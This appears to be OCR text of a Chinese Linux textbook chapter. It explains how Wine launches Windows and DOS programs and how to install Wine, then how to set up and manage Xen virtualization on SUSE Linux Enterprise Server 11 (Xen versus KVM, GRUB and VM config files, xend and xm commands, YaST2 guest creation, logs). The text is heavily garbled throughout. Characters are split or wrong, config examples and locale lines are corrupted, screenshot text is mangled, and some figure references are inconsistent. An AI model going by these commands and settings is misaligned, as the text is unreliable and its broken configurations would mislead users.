的 慑 辑 过 程 ， 包 括 初始 化 命令 行 参数 ， 在 文件 系统 中 寻找 相应 的 可 执行 文件 。 如 果 没 有 找到 ， 
Wine 装载 器 停止 装载 并 返回 出 错 信息 ; 否则 ， 将 找到 的 文件 载 入 内 存 ， 建 立 一 个 堆栈 供 新 建 
立 的 可 执行 文件 的 进程 使 用 ， 扒 栈 大 小 由 该 文件 结构 中 的 PE_header 定义 。 

贺 NtdlLLdrmitializeThunk 执行 其 他 操作 ， 如 解析 所 有 在 可 执行 文件 中 引用 的 DLL 与 
TLS 槽 的 初始 化 。 

辆 转 入 到 可 执行 文件 的 入 口 点 ， 可 执行 文件 开始 运行 。 


如 果 有 多 个 Win32 程序 要 求 运行 ，Wine 为 这 些 Win32 程序 分 别 建立 Wine 进程 。 这 些 
Win32 程序 在 各 自 的 Wine 进程 中 运行 ， 如 图 8.2 所 示 。 


图 8.2 ”Wine 进程 图 


8.1.5 ”Winelib 启动 分 析 


Winelib (假定 有 一 个 文件 example.exe) 对 应 有 两 个 文件 : example 为 一 个 链接 到 Wine 装 
载 器 的 符号 链接 : example.exe.so 相当 于 一 个 Linux 中 的 动态 链接 库 。 

从 命令 行 启动 一 个 Winelib 程序 时 , Linux Shell 将 example 作为 一 个 Linux 的 可 执行 文件 。 
由 于 它 实际 是 Wine 的 一 个 装载 器 ， 所 有 Wine 被 启动 并 利用 Linux 的 共享 库 机 制 加 载 第 二 个 
文件 example.exe.so。Wine 根据 文件 的 描述 符 确 认 它 是 一 个 32 位 模块 ， 于 是 共享 库 被 加 载 ， 
再 处 理 该 可 执行 文件 的 导入 节 ， 调 用 全 局 对 象 的 构造 器 ， 便 于 以 后 加 载 动态 库 函 数 ， 最 后 转 入 
可 执行 文件 的 入 口 点 ， 载 入 的 文件 开始 运行 。 


8.1.6 Win16 与 DOS 程序 启动 分 析 
一 个 Win16 程序 要 求 运行 时 ，Wine 将 该 程序 交 给 虚拟 DOS 机 (VDM) 。 虚 拟 机 首先 建 
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立 一 个 16 位 的 运行 环境 ，Win16 程序 就 在 该 虚拟 环境 中 运行 。 此 后 由 该 程序 创建 的 子 程序 均 
在 同一 虚拟 机 实例 中 运行 。 虚 拟 机 为 16 位 的 进程 提供 了 诸如 多 任务 协作 、 共 享 地 址 空间 、 管 
理 为 16 位 进程 建立 的 代码 段 、 数 据 段 与 堆栈 段 的 选择 器 等 功能 。 

DOS 程序 的 启动 与 Win16 的 启动 过 程 类 似 , 虚拟 机 对 DOS 程序 还 采用 互 斥 机 制 保证 DOS 
程序 的 运行 是 单线 程 的 。 


8.1.7 ”Wine 安装 


可 以 在 http: //fedoraproject.org/wiki/AndreasBierfert/Wine 中 下 载 到 针对 Fedoral2 的 Wine 
最 新 版 本 1.1.38, 到 安装 目录 中 运行 wineinstall( 安装 释放 文件 ) 文 件 , 之 后 它 会 运行 ./configure， 
然后 显示 : 


We need to install wine as root user, do you want us to build wine,'su root' 
and install Wine? Enter 'no' to continue without installing(yes/no) 


选择 Yes 并 按 回 车 键 即 可 ， 如 果 在 此 处 出 现 错 误 ， 请 检查 此 命令 的 输出 ， 如 果 系 统 没有 
找到 一 些 需要 的 包 ， 而 你 又 希望 使 用 那个 包 提供 的 功能 时 ， 请 安装 相应 的 devel 包 。 

如 果 root 用 户 设置 了 密码 ， 还 会 提示 输入 密码 。 待 屏幕 上 出 现 : 

Installation complete for now. Good luck (this is still alpha software) . 


IE you have problems with WINE， Please read the documentation first, 
as many kinds of potential problems are explained there. 


看 到 这 条 提示 ， 则 表示 安装 成 功 了 。 

在 Shell 下 运行 Wine， 第 一 次 运行 不 成 功 是 正常 的 ， 因 为 没有 在 /root/.wine/config 文件 里 
配置 好 ， 找 到 以 下 代码 : 

[Drive CI] 

"Path" = "/usr/share/win_c" 

"Type”" = "hd" 

"Label" = "MS-DOS" 

"Filesystem" = "win95" 


改 为 : 


"Path" = "/winc" 
xsTwEGS "ha 

"Label" = "MS-DOS™" 

"Filesystem" = "win95" 

如 果 安 装 了 simsun 字体 ，Wine 默认 会 找到 这 个 字体 的 。 

在 运行 Windows 程序 时 ,常常 会 出 现 看 不 到 中 文 的 情况 , 那 是 因为 在 GBK 或 GB2312 编 
码 状 态 下 可 以 输入 中 文 ， 但 如 果 没 有 进行 默认 编码 设置 ， 就 无 法 输入 中 文 。 

可 通过 设置 locale 解决 ， 即 编辑 .bashre 文件 ， 在 该 文件 尾部 添加 如 下 两 行 : 


export LANG=zh CN.gb2312 
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export LC ALL=zh CN.2312 


重新 运行 bash 后 输入 locale 命令 ， 默 认 的 编码 就 会 显示 GB2312 了。 另外， 还 有 就 是 如 
果 没 有 中 文字 体 也 无 法 显示 中 文 ， 自 然 也 就 看 不 见 汉字 。 
运行 应 用 程序 时 有 两 种 方式 : 自动 运行 和 手动 运行 。 
@ 自动 运行 在 KDE 或 者 GNOME 的 文件 管理 器 中 切换 到 应 用 程序 所 在 目录 ， 单 击 就 
可 以 打开 ， 但 程序 运行 速度 十 分 缓慢 。 
@@ 手动 运行 : 在 Console 模式 下 ， 输 入 这 条 命令 : “wine < 将 要 运行 的 应 用 程序 > ”。 


例如 : 想 要 通过 Wine 在 Linux 下 使 用 Winzip， 操 作 方 法 是 : 重新 运行 winesetup， 在 配 
置 Windows 安装 路 径 窗口 中 ， 选 择 “Create a new windows directory 〈 创 建 一 个 新 的 Windows 
安装 目录 ) ”， 然 后 在 Linux 中 直接 运行 Winzip 安装 文件 安装 Winzip 即 可 。 


8.2 基于 SUSE Linux Server 上 的 Xen 虚拟 化 应 用 


8.2.1 Xen 和 KVM 虚拟 化 的 对 比 


Red Hat 在 2007 年 发 布 RHEL 5， 采 用 的 是 Xen 来 提供 虚拟 化 功能 。 同 年 NOVELL 也 在 
SUSE 10.0 的 企业 版 中 开始 使 用 Xen 技术 ， 从 RHEL 5.4 开始 首次 引入 了 KVM 虚拟 化 技术 ， 
Xen 和 KVM 主要 有 什么 区 别 呢 ? 从 代码 复杂 度 上 来 看 , KVM 代码 更 加 精炼 ; 而 从 架构 上 讲 ， 
Xen 是 自 定 制 的 Hypervisor， 对 硬件 的 资源 管理 和 调度 、 对 虚拟 机 的 生命 周期 管理 等 ， 都 是 从 
头 开始 写 的 。KVM 是 一 个 特殊 的 模块 ，Linux Kernel 加 载 此 模块 后 ， 可 以 将 Linux Kernel 变 
成 Hypervisor， 因 为 Linux Kemel 已 经 可 以 很 好 地 实现 对 硬件 资源 的 调度 和 管理 ，KVM 只 是 
实现 了 对 虚拟 机 生命 周期 管理 的 相关 工作 , Xen 目前 支持 Full Virtualization (全 虚拟 化 ) 和 Para 
Virtualization。 全 虚拟 化 的 好 处 在 于 现 有 的 X86 架构 的 操作 系统 可 以 不 用 修改 , 直接 运行 在 虚 
拟 机 上 。 Para Virtualization 的 好 处 是 性 能 好 ， 但 是 虚拟 机 上 运行 的 操作 系统 内 核 要 修改 。 下 
面 主要 讲述 了 Xen 虚拟 化 技术 的 特点 及 使 用 方法 。 


8.2.2 ”Xen 的 特点 


虚拟 机 自从 成 为 媒体 宠儿 之 后 ，VMware 一 下 直接 冲 上 全 球 第 4 大 软件 厂商 排名 ， 使 
VMware 伍 然 成 为 虚拟 机 的 代名词 。 但 老实 说 , 真正 让 VMware 流行 的 产品 , 应 该 还 是 VMware 
Workstation， 其 在 测试 、 评 估 等 领域 早已 深入 人 心 了 。 但 说 到 企业 的 虚拟 机 这 一 领域 ， 仍 然 还 
有 许多 厂商 在 努力 ， 其 中 比较 有 名 的 除了 开源 的 QEMU 之 外 ， 最 重要 的 就 是 由 剑桥 大 学 的 
lanPratt 所 开发 的 Xen 虚拟 机 产品 ， 而 目前 Xen 的 代码 ， 仍 然 由 剑桥 大 学 负责 维护 。 

Xen 也 是 支持 X86 的 虚拟 机 ， 自 开发 到 现在 一 直 为 开源 软件 。 而 Xen 最 重要 的 特色 就 是 
其 为 一 标准 的 硬件 支持 的 虚拟 机 产品 。 在 Xen 的 规划 中 ， 其 Hypervisor 位 于 最 低 也 就 是 最 有 
特权 的 层级 中 。 在 这 层级 之 上 运行 多 个 OS， 由 Hypervisor 来 控制 主机 的 实体 CPU 分 配 。 
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8.2.3 Xen 架构 和 Xen 虚拟 化 技术 简介 


Xen 架构 可 以 使 超 虚 拟 化 的 操作 系统 直接 访问 硬件 ， 并 且 几 乎 对 性 能 没有 任何 影响 。 

Xen 是 一 个 半 虚 拟 化 (paravirtualization) 的 产品 ， 这 一 类 产品 最 明显 的 特色 就 是 在 其 上 运 
行 的 OS 必须 经 过 修改 。 当 然 这 么 做 的 目的 就 是 希望 客户 端的 OS 可 以 和 Hypervisor 沟通 更 良 
好 ， 并 且 不 会 占用 太 多 的 资源 ， 结 构 如 图 8.3 所 示 。 

Xen 分 成 多 个 层级 (Layer) 执行 。 它 将 Linux 的 核心 修改 后 ， 再 使 用 修改 过 的 核心 开机 ， 
而 开机 后 先 载 入 Xen 的 监控 器 (Hypervisor) ， 并 且 启 动 第 一 个 操作 系统 ， 称 为 Domain-0。 在 
Xen 上 面 所 谓 的 一 个 Domain 就 是 指 一 个 虚拟 机 ， 如 图 8.4 所 示 。 


VMO VM1 VM2 VM3 


， 目 四 
”本 加 加 面 面 


虚拟 机 监视 程序 (超级 管理 程序 ) 
了 
图 8.3 ”Xen 结构 图 图 8.4 Xen 的 虚拟 机 
虚拟 机 由 位 于 操作 系统 和 硬件 之 间 的 虚拟 机 监视 程序 (超级 管理 程序 ) 层 启用 。 此 层 可 以 
协调 对 硬件 资源 的 访问 ， 并 允许 多 个 操作 系统 实例 在 单一 服务 器 上 和 谐 共 存 。 包 含 Xen 虚拟 
化 和 超 虚 拟 化 客户 操作 系统 的 基本 企业 架构 ， 如 图 8.5 所 示 。 


虚拟 机 


物理 机 器 


图 8.5 基本 企业 架构 图 
但 在 支持 虚拟 指令 的 CPU 上 市 之 后 ，Xen 也 随 之 推出 了 能 和 这 些 指令 配合 的 3.0 版 ， 
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这 使 得 完全 不 需要 修改 的 Windows 系统 也 可 以 在 domU 上 运行 ， 而 在 3.0 之 后 ，Xen 也 从 
“ 半 虚 拟 化 ”的 虚拟 机 产品 正式 成 为 完全 虚拟 化 的 产品 ,而 在 加 入 了 Windows 成 为 客户 端 
之 后 ， 整 个 世界 都 变 得 不 同 : 从 前 只 能 专 精 在 Linux/UNIX 上 的 产品 ， 现 在 也 成 为 跨 平台 
的 虚拟 机 产品 了 。 


8.2.4 安装 使 用 SUSE Xen 软件 


如 果 你 是 初次 安装 , 建议 你 在 系统 安装 的 时 候选 择 “Xen Virtualization Host (Local X11 Not 
Configured by Default) ”， 如 图 8.6 所 示 。 


3 slesi11 记 抽 系统 经 疯 
虚拟 系统 (MD ”查看 WD Send key 帮助 
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Choose the one that matches your server the bat 
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图 8.6 系统 安装 选择 界面 


如 果 熟 悉 SUSE， 那 么 你 可 以 手动 安装 RPM 包 。 如 图 8.7 所 示 的 Xen 相关 包 需 要 进行 安 
装 。 


“294 。 
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安装 相关 的 包 


在 http://www.xensource.com/downloads/ 下 载 如 下 安装 包 : 


# tar zxvf xen-3.x-install.tgz 


# cd xen-3.0-install 
# sh ./install.sh 


除 此 之 外 ,手动 配置 /boot/grub/grub.conf 文件 也 是 必 不 可 少 的 步 又， 修改 grub 的 配置 ， 如 


图 8.8 所 示 。 


title 


图 8.8 


###Don' t change this comment - YaST2 identifier: 


修改 grub 的 配置 


Original name: xen### 相 


如 果 你 准备 从 tar 包 开 始 安 装 ， 那 就 麻烦 了 。 首 先 下 载 Xen 源 代码 包 ， 并 下 载 相应 版 本 的 
Linux 内 核 源 代码 包 ， 按 需要 修改 相应 的 配置 选项 ， 而 后 编译 Xen， 由 Xen 自动 调用 编译 程序 
编译 Linux 源 代码 ， 产 生 并 且 自 动 安装 新 内 核 。Xen 的 运行 需要 内 核 的 支持 ， 因 此 在 编译 时 不 


能 直接 编译 内 核 源 代码 包 ， 必 须 从 Xen 源 代码 开始 编译 ， 而 后 
相对 应 内 核 版 本 的 Linux 源 代码 文件 ,编译 带 Xen 支持 的 Linux 


4 Xen 编译 配置 文件 自动 引用 
内 核 的 方法 和 过 程 同 之 前 的 内 


核 编译 有 很 大 的 不 同 ， 因 此 按 以 前 的 常规 方法 编译 出 的 新 内 核 是 无 法 提供 Xen 支持 的 。 当 前 
厂商 提供 了 编译 好 的 二 进 制 包 文件 , 用 户 直接 下 载 安装 就 可 以 了 , 但 这 样 用 户 就 无 法 在 新 内 核 


中 配置 合乎 自身 应 用 需求 的 选项 了 。 
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1. 查看 CPU 对 虚拟 化 的 支持 程度 
Intel 和 AMD 的 半 虚 拟 化 支持 标识 -PAE: 


# cat /proc/cpuinfo | grep flags 
flags : fputscmsrpaemce cx8 apicmtrrmcacmov pat pse36 clflushdtsacpi mmx fxsrsse 
sse2 ssnxconstant tscpni ssse3 


Intel 全 虚拟 化 支持 标识 - VMX: 


# cat /proc/cpuinfo | grep flags 
flags : fputscmsrpaemce cx8 apicmtrrmcacmov pat pse36 clflushdtsacpi mmx fxsrsse 


sse2 ssht tm pbenx lm constant tsc up pni monitor ds_cplvmxest tm2 cx16 xtprlahf lm 
注意 以 下 事项 : 


@ 一 些 厂商 禁止 了 机 器 BIOS 中 的 VT 选项 ， 在 这 种 方式 下 VT 不 能 被 重新 打开 。 
@ /proc/cpuinfo 仅 从 Linux 2.6.15 (Intel) 和 Linux 2.6.16 (AMD ) 开始 显示 虚拟 化 方面 
的 信息 ， 请 使 用 uname -命令 查询 您 的 内 核 版 本 。 


2. 开机 启动 选择 使 用 Xen 
开机 时 必须 启动 带 Xen 选项 的 内 核 ， 如 图 8.9 所 示 。 


SUSE Linux Enterpiise Server 11 - 2.6.27.19-5 (default] 


Fail SUSE 


Xen -- SUSE Linux Enterprise Server 11 
软盘 


vga=0x314 


图 8.9 开机 启动 选择 界面 
如 图 8.10 所 示 ， 是 带 Xen 功能 内 核 的 启动 画面 。 
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图 8.10 ”启动 画面 


说 明 : 要 使 用 Xen 虚拟 机 ， 必 须 使 用 定制 的 内 核 ，SLES11 中 内 置 了 该 kernel-xxxx-xen… 
RPM。 安 装 此 RPM， 并 在 启动 时 选择 该 内 核 启动 即 可 。 


8.2.5 引导 Xen 系统 


引导 系统 将 要 带 你 进 个 特权 的 管理 域 Domain0。 在 这 一 点 上 ， 准 备用 xm create 命令 
创建 来 宾 域 。 在 de 第 一 个 客户 端 OS 被 称 之 为 第 0 域 (Domain 0, Dom0)，, 当 Hypervisor 
启动 时 ，Domo 会 被 自动 加 载 ， 并 且 会 从 ye 处 获得 特权 用 来 直接 管理 硬件 的 资源 。 虚 
拟 系 统管 理 界 面 如 图 8.11 所 示 。 系 统管 理 员 主要 是 登录 到 Dom0 中 ， 接 下 来 才能 启动 其 他 的 
客户 端 0S， 称 之 为 第 U 域 (Domain U，DomU) 。 在 Dom0 中 已 执行 的 OS 必须 经 过 核心 的 
修改 ， 而 且 大 部 分 都 是 Linux、NetBSD 和 Solaris。 许 多 修改 过 的 Linux OS 则 是 可 以 在 DomU 
中 执行 ， 并 且 需 要 有 特殊 硬件 的 搭配 ， 因 此 Xen 一 直 无 法 受到 广大 视窗 用 户 的 喜爱 。 


文件 人 编辑 (E) 查看 帮助 由 


查看 GO ;| 所 有 虚拟 机 


名 称 vo staus CPUusage 。 VCPUs Memory usage 
locahost xen Actw 35% 4 1s2G8 国 
Doman0 0 GilRunning 3sx _% 1s2G6 国 
slesi1 ~ 中 Shuhfr aoms sm00 Ms EE 


图 8.11 虚拟 系统 管理 界面 


如 图 8.12 所 示 ，xmexamplel 是 一 个 VM 配置 文件 的 实例 ，xmexample2 文件 是 一 个 模板 
描述 ， 目 的 是 为 多 个 虚拟 机 的 重用 。 配 置 文件 模板 的 内 容 如 图 8.13 所 示 。 


linux-66ua:/etc/xen/examples # 1s 
总 计 76 

-zw 一 1 root root 
-rwr- 一 一 1 root root 8 


-zw 一 1 root root 
-zw 一 1 root root 
-zw 一 1 root root 
-wz 一 1 root root 
-zw 一 1 root root 
-zw 一 1 root root 
-wz- 一 1 root root 69 -01-05 xmexample. pv-grub 


图 8.12 VM 配置 文件 实例 
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ET 于 
立 件 (F) 编 刀 伍 ) 查看 VM 党 诺 (D， 标签 人 帮 动 0H) 

让 
# Kernel image file and (optional) ramdisk (initrd). 
|kernel = "/boot/mlinuz-xen” 

[romdisk = "/boot/initrd-xon” 


|# Or use domUloader instead of kernel/randisk 
bootloader = "/usr/lib/xen/boct/denlloader. py’ 
Wbootentry = “hda2:/wmlinuz-xer /initrd-xen” 


get kernel from donU FS 


I# The domain build function Default is "linux’. 
Wbuilder=" linux 


W# Initial memory allocation (in negabytes) for the new domain. 


避 
# WARNING: Creating a domain with insufficient memory way cause out of 
内 memary errors. The donain needs enough menory to boot kernel 
由 and modules. Allocating less than 32Mbs is not recommended. 


Imemory = 54 


# A name For your domain. All donains must have different names. 
Iname = “ExampleDomain” 


# 128-bit UUID for the domain. The default behayior is to generate a new UUID 
# on each call to "xm create’. 
Huuid = "06ed00fe-1162-4fc4-b5d8-11993ee4agbg” 


# oll vepus run on CPUO 
$3,5, "1" # all vcpus run on cpus 0, 2,3,5 
2", "3"] # VCPUD runs on CFU2, WCPUL runs on CPU3 


从 Numbcr of Virtual CPUS to use，dcfault is 1 
I#vcpus = 1 


图 8.13 VM 配置 文件 模板 
对 图 8.16 的 说 明 如 下 。 
@ Kernel: 为 Xen 设置 编译 内 核 的 路 径 (e.g. kernel="/boot/vmlinuz-2.6-xenU" )。 
@ Memory: 设置 DOMAIN 的 内 存 大 小 。 
@ Disk: 设置 硬盘 大 小 。 
@ Dhcp: 设置 DHCP. 


你 还 可 以 通过 配置 vif 变量 设置 MAC， 如 图 8.14 所 示 。 如 果 没 有 设置 此 值 ， 那 么 xend 守 
护 进程 将 自动 为 您 设置 好 ， 即 00:16:3E:xx:xx:xx， 如 图 8.15 所 示 。 


1 para bo Random 


图 8.14 MAC 自动 设置 界面 
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虚拟 网 络 适 配器 


请 指定 虚拟 网 络 适配器 的 设置 


名 称 : 1 
类 型 ，| 已 超 虚拟 化 


co 


源 ，| bo 
MAC 地 址 : 图 随机 生成 的 MAC 地 址 
指定 的 MAC 地 址 00.16.3e 


图 8.15 ”xend 自动 设置 MAC 值 


Domain-0 之 所 以 要 先 被 载 入 是 因为 它 含 有 其 他 虚拟 机 启动 所 必须 的 控制 指令 ， 并 且 
Domain-0 也 是 控制 虚拟 装置 的 重要 主 控 系统 。 在 Domain-0 上 最 重要 的 就 是 一 个 xend 的 常 驻 
进程 ， 其 他 的 Domain 都 是 由 这 个 xend 来 管理 的 。 至 于 命名 方面 ， 除 了 Domain-0 之 外 的 其 他 
虚拟 机 依 序 称 为 Domain-1、Domain-2 等 ， 我 们 统称 为 Domain-U。Domain-0 是 很 重要 的 ， 因 
为 它 直接 控制 Xen 的 监控 器 (Hypervisor) ， 而 且 掌握 了 真实 的 Linux 驱动 程序 (drivers) 。 
而 其 他 的 虚拟 机 (Domain-U) 则 是 透 过 Xen 监控 器 来 与 真实 的 硬件 以 及 Domain-0 进行 交互 。 

为 了 让 Domain-0 能 够 与 Xen 结合 ， 我 们 必须 要 修改 Domain-0 的 核心 才能 顺利 运行 。 并 
且 需 要 使 用 Domain-0 的 核心 来 开机 。Domain-0 是 所 有 虚拟 机 的 基础 ， 所 以 它 可 以 尽量 简洁 ， 
其 他 的 个 别 服务 则 可 以 放置 到 不 同 的 Domain 中 。xend 可 以 管理 Domain-0 与 其 他 Domain 之 
间 的 启动 与 交互 , 提供 一 个 终端 控制 (Console) 界面 来 让 Domain-0 登入 其 他 的 Domain。xend 
是 节点 控制 的 守护 进程 ， 用 于 执行 系统 管理 有 关 的 职能 ， 形 成 了 一 个 虚拟 化 资源 中 心 控 制 点 ， 
主要 用 于 启动 和 管理 虚拟 机 。 

xend 必须 是 以 root 身份 运行 ， 因 为 它 需 要 获得 授权 的 系统 管理 功能 。xend 是 用 Python 
编写 的 ， 在 系统 启动 时 它 将 读 取 配置 信息 (/etc/xend/xend-config.sxp) ， 实 际 上 Xen 是 由 一 个 
后 台 守 护 进程 维护 的 ， 即 xend， 要 运行 虚拟 系统 ， 必 须 先 将 它 开启 。 它 的 配置 文件 位 于 
/etc/xen/xend-config.sxp， 内 容 包 括 宿主 系统 的 类 型 、 网 络 的 连接 结构 、 宿 主 操作 系统 的 资源 使 
用 设 定 ， 以 及 vnc 连接 的 一 些 内 容 。 

下 面 通过 命令 行 启动 : 


xend start 
xend stop 
xend restart 


xend status 


砷 非 厘 非 砷 


chkconfig -add xendomains 
xendomains O:off 1:0off 2:0ff 3:on 4:0ff 5:on 6:0ff 


xm 是 配置 XEN 的 主要 工具 。 其 命令 格式 如 下 : 
# xm command [switches] [arguments] [variables] 


比如 ， 在 命令 行 执行 xm help 命令 ， 将 显示 帮助 信息 如 图 8.16 所 示 。 
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Bis-66ee: /ver/1e0/zen # xm help 


console 
vneviewer 
create 

new 

delete 
destroy 

domid 

domname 
damp-core 
list 

mem-max 
mem-set 
migrate 

pause 

reboot 

renenme 

reset 

restore 
resune 

save 
snapshot-create 
snapshot-list 
snapshot-spply 
snapshot-delete 
shutdown 
start 

suspend 

sysrq 

trigger 

top 

npanse 
uptine 
veporlist 
vepurpin 
vepurset 


计算 机 


@ #xmlist; 虚拟 主机 列表 。 


sage; xm subconmand> [srgs] 
[Control, list, and manipulate Xen guest instances. 


m full list of subcommands: 


Mttach to 人 Domain> = console. 

Attach to Domain)'s VHC server. 

Create a domain based on ConfigFile>. 

Adds a domain to Xend domain management 
Remove a domain from Xend domain menagement. 
Terninate a donain immediately. 

Convert a domain name to domain id 

Convert a domain id to domain name 

Domp core for s specific domain. 

List information about sll/some domains. 
Set the maximum amount reservation for a domain 
Set the current memory usage for a domain. 
Migrate a domain to snother machine， 

Pause execution of a domain. 

Reboot a domain 

Renene a domain, 

Reset a domain. 

Restore a domain from a saved state, 

Resune a Xend managed domain 

Save a domain state to restore later, 
Snapshot a running domain- 

List svailable snapshots for a domain. 
Apply previous snapshot to domain. 

Delete snapshot of domain 

Shutdown a domain. 

Start a Xend managed domain 

Suspend a Xend managed domain 

Send a sysrq to a domain 

Send a trigger to a donain. 

Monitor a host and the domains in real time. 
Unpanse a paused domain. 

Print uptime for all/some domains. 

List the VCPUs for 41l/some domains. 

Set which CPUs a VCPU can use. 

Set the momber of active VCPUs for sllowed for 
the domain. 


| 国 iinux-66ua | 全 [YasT2 控制 中 心 ] 0 


图 8.16 帮助 信息 
Xen 控制 虚拟 主机 的 常用 命令 如 下 。 


®@ #xmshutdown domain01: 关闭 虚拟 主机 ，domain01 为 虚拟 主机 名 ， 也 可 用 id 代替 。 
®@ #xmcreate domain01: 启动 一 个 虚拟 主机 ，domain01 为 虚拟 主机 名 。 


8.2.6 安装 Xen 客户 机 一 一 Domain-U 


在 命令 行 直接 输入 yast2， 即 可 打开 如 图 8.17 所 示 的 界面 ， 我 们 选取 左 侧 的 “虚拟 化 ” 选 
项 即 可 创建 虚拟 机 ， 如 图 8.18 所 示 。 
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Novell AppArmer 


安全 和 用 户 

软件 Eoin 图 5 
fe 打 Ep 检 3 i 
网 设备 EE 也 

了 @ tre 全 1h 设备 
虚拟 化 

硬件 时 ii 局 © Mus 


图 8.17 YaST2 控制 中 心 


创建 虚拟 机 


此 助手 将 引导 用 户 完成 新 虚拟 机 (VM) 的 创建 。 将 向 您 创建 虚拟 机 


询问 一 些 要 创建 的 VM 相关 信息 ， 比 如 : 
@ ”将 在 新 VM 中 运行 的 操作 系统 类 型 


”是 否 要 将 VM 全 虚拟 化 或 超 虚 拟 化 如 果 完 全 重新 创建 此 VM， 则 需要 去 装 操作 系统 。 将 攀 理 计算 机 迁 
Hg 有 Vt 


作 系统 的 磁盘 的 位 : 十 我 需要 安装 操作 系统 。 
”VM 的 其 它 特 征 ， 比 如 内 存 、 处 理 器 和 网 络 适配器 。 我 拥有 已 安装 操作 系统 BR 盘 或 进 盘 里 象 。 


图 8.18 创建 虚拟 机 界面 
选取 适合 的 OS， 例 如 SUSE Linux Enterprise Server 11， 如 图 8.19 所 示 。 


四 创建 天 的 机 


请 选择 将 在 虚拟 机 内 运行 的 操作 系统 的 类 型 。 这 将 定义 
许 地 默认 值 并 帮助 确定 超 虚 摧 化 操作 系统 全 启动 方法 。 


= susE 
Novell Open Enterprise Server 2 (Lnux) 
SUSE Lnux Enterprise Desktop 10 
SUSE Lnux Enterpnse Desktop 11 


SUSE Lnux Enterprise Sener8 
SUSE Lnux Enterprise Sener 9 
SUSE Lnux Enterprise Server 10 


SUSE (其 它 ) 
openSUSE 
openSUSE 11 
= Windows 
Windows NT 
Windows Server 2008 
Windows Server 2008 (x64) 
Windows Vista | 
Windows Vista (x64) 
Windows XP 、2000 、2003 


【> 


图 8.19 选择 操作 系统 类 型 
配置 完成 后 的 界面 如 图 8.20 所 示 。 
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创建 虑 开机 


请 单 击 任意 标题 ， 以 癌 填 更改 。 如果 设 置 正确 , 请 
单 韦 确定 8 时 VM。 


虚拟 化 方法 
已 超 硬化 


虚拟 机 名 称 


sles11 


最 大 内 存 : 。 512 MB 
虚拟 处 理 器 : 1 


图 形 
起 虚拟 从 9 国 撒 活 本 器 


1 4.0 G3 硬盘 ls/Narlb/xan/mages/sles11/disk0) 
2 27 63 CD-ROM 或 DVD (pmyydewsro) 
网 络 适配器 
1: 已 超 虹 化; 随机 生成 鸭 MAC 地 址 
操作 系统 安装 


撮 作 系统 : 。 SUSE Linux Entsrprise Sever 11 
安装 源 : 27 GB CD-ROM 或 DVD @phy/devws0) 
装 : 


@nic| [gine [mso | 


图 8.20 虚拟 机 配置 完成 界面 
下 面 对 图 8.20 中 的 一 些 参数 术语 进行 以 下 说 明 。 


@ Phy:/dev/sr0: 代表 物理 DVD 驱动 器 。 

@ 无 图 形 支持 : VM 将 像 没有 监视 器 的 服务 器 一 样 工作 ， 可 以 通过 SSH、VNC 或 囊 行 端 
口 来 访问 操作 系统 。 

@ 完全 虚拟 化 : 在 这 种 类 型 的 虚拟 化 中 ， 完 整 的 平台 是 通过 硬件 或 软件 (或 通过 两 者 的 
组 合 ) 进行 模拟 的 ， 用 于 支持 未 经 更 改 的 操作 系统 。 使 用 此 方法 ， 无 须 自 定义 客户 机 
操作 系统 。 不 过 ， 由 于 操作 系统 设计 为 在 物理 硬件 上 运行 ， 因 此 无 法 识别 虚拟 机 监视 
程序 (Virtual Machine Monitor )， 也 称 为 “超级 管理 程序 ”， 虚 拟 机 无 法 与 其 他 虚拟 机 
合作 来 共享 资源 和 优化 性 能 。 

@ 超 虚 拟 化 : 与 完全 虚拟 化 不 同 ， 超 虚拟 化 仅 部 分 模拟 硬件 。 超 级 管理 程序 会 借助 一 些 
有 助 于 将 基本 硬件 资源 提取 给 虚拟 机 的 API。 超 虚拟 化 要 求 对 客户 机 操作 系统 中 与 硬 
件 相 关 的 部 分 进行 修改 ， 从 而 识别 虚拟 化 层 。 目 前 ， 超 虚拟 化 的 虚拟 机 的 性 能 可 能 全 
面 超过 完全 虚拟 化 的 虚拟 机 ， 有 具体 取决 于 特定 的 使 用 情况 。 


配置 参数 确认 无 误 后 ， 单 击 “ 确 定 ” 按 钮 就 开始 新 建 一 个 4GB 的 文件 系统 ， 如 图 8.21 所 
示 ， 并 开始 引导 系统 安装 过 程 了 ， 如 图 8.22 所 示 。 
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| 创建 虚拟 机 ET 


虚拟 化 方法 
虚拟 机 名 称 


硬件 


图 形 


磁盘 


网 络 适配器 


操作 系统 安装 


图 8.21 开始 创建 虚拟 机 


名 正在 配置 VM 服务 器 ( 域 0) 


sies11 虚拟 系统 终端 
下 忱 验 已 安装 的 包 虚拟 系统 (WD 查看 CD Sendkey 奈 助 Hb) 
-mm m © 

暂停 ”关闭 


Ce 国 Perform Installation 


SUSE.Linux 
Enterprise 


Ppreparation 17268 1037 2502 


Contiguration 


国 xosvie 


[binue- 


图 8.22 ”安装 系统 过 程 界面 
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8.2.7 ”故障 查询 


1. 系统 管理 员工 具 和 日 志 
你 可 以 使 用 这 些 标准 的 系统 管理 员工 具 和 日 志 来 协助 故障 解除 : xentop、xm dmesg、xm 


log、 vmstat、iostat、lsof。 


2. 有 关 网 络 的 连通 问题 


虚拟 网 络 设备 有 三 种 模式 : bridge 桥 模式 、router 路 由 模式 和 nat 模式 。 其 中 桥 模式 是 默 
认 模式 ， 在 这 种 模式 下 ， 虚 拟 系统 和 宿主 系统 被 认为 是 并 列 的 关系 ， 虚 拟 系统 被 配置 IP 或 者 
DHCP 后 即 可 连通 网 络 。 


3. Xen 的 日 志 系统 


要 想 处 理 好 故障 必须 知道 Xen 的 日 志 系统 及 含义 ， 所 有 启动 运行 细节 都 将 记录 到 日 志 
中 ，/var/log/xen/xend.logxend.log 是 包含 xend 守护 进程 收集 的 所 有 数据 的 日 志文 件 ， 不 
管 数据 是 普通 的 系统 事件 ， 还 是 操作 者 执行 的 动作 。 所 有 虚拟 机 的 操作 《〈 如 创建 、 关 闭 、 
销毁 等 ) 都 在 此 出 现 。xend.log 通常 是 你 跟踪 事件 或 性 能 问题 的 第 一 个 着 手 点 。 它 包含 错 
误 信 息 的 详细 条 目 和 条 件 。xend.log 文件 包含 了 与 运行 xm log 命令 相同 的 基本 信息 ， 位 
于 /varlog/ 目 录 里 。 

xend-debug.log 是 包含 xend 和 虚拟 化 子 系统 (如 framebuffer、Python 脚本 等 ) 的 事件 错 
误 记录 的 日 志文 件 。xend-debug.log 对 于 系统 管理 员 而 言 也 是 非常 有 用 的 ， 因 为 它 包 含 了 比 
xend.log 更 为 详细 的 信息 。 

xen-hotplug-log 是 包含 热 插 拔 事件 的 数据 的 日 志文 件 。 如 果 设 备 或 网 络 脚本 没有 被 启动 ， 
